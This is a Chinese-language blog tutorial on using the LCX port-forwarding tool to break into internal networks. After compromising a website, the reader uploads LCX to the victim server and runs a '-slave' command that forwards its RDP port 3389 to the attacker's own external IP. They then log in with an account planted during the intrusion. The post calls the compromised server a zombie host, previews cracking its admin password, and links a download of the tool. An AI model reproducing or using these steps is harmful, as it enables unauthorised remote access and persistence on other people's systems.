LCX端口转发实现内网突破

前些天都在工作，在业余时间我也在不断的看书，为了这次教程的成功更新，现在开始就开始更新web安全教程啦，其中涉及的动画教程不一定都是本博客所有

LCX的诞生理论

在理论上只要连着网我们都可以访问的，但是什么是现实呢，现实中往往由于技术的原因我们的实现是有困难的，在局域网中某台计算机仅仅开放了web服 务，该服务仅仅提供内网用户的使用，而外网的用户无法直接访问。因此我们需要端口的映射等操作才可以访问，所以说端口映射是在入侵内网的时候常用到的，特 别想要登录远程的服务端时，这就非常的方便了。

LCX的使用的大概方法

LCX.exe就是一个端口转发的功能，你比如说：当我们入侵一个网站的后台后在cmd中执行“ipconfig /all”命令后发现是内网的地址这是我们登录服务器是不可以的，那怎么办呢，总不能将这白花花的肉鸡丢掉把，其实很简单，我们只需要用到LCX这个工具 就可以实现，比如我们这台内网的地址主机是A（内网）我们只需要上传我们的lcx工具后，在具有外网的主机B（外网）中施行中转，意思就是说将A中的 3389端口转发到具有外网IP地址的B主机上，这样我们只要链接B主机的3389端口，就相当于链接了A主机的3389端口

LCX的步步为营

 

• 第一步：我们需要在自己的电脑，或者在具有外网IP的主机上进行端口监听。

  目的：是为了监听本地的一个未工作的端口51（这里我用的是51端口）来接收被控端的3389转来的数据

  如果你想找到你那个程序占用这端口一: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!而终端所对应的服务名为：TermService
  二：用netstat -ano命令，列出所有端口对应的PID值!
  找到PID值所对应的端口在任务管理器中关闭即可

  实现的方法是点击我给大家打包的1.bat后输入： “lcx.exe -listen 51 33891” 去掉代码中的双引号，意思是监听本地的51端口。

  
  出现上图的则成功了

• 第二步：就是在内网A主机网站中上传LCX然后执行：“lcx.exe -slave 你的外网IP 51 127.0.0.1 3389”
  上传LCX软件后找到位置：
  

  然后只知道了位置后执行“lcx.exe -slave 你的外网IP 51 127.0.0.1 3389”其中“lcx.exe“是刚才上传的位置

  
  成功后回显：
  

• 第三步：链接内网的主机：
  
  输入你开始攻陷网站后添加的账户即可进入，发现本机的51端口在和3389进行数据的链接。
• 第四步：进行本地的管理员密码的破解了，我们不可能在使用建立的临时用户这样这个鸡迟早丢掉的，时间原因我将在下次中给大家讲解。

LCX工具高速下载：LCX工具（360会报毒请酌情下载）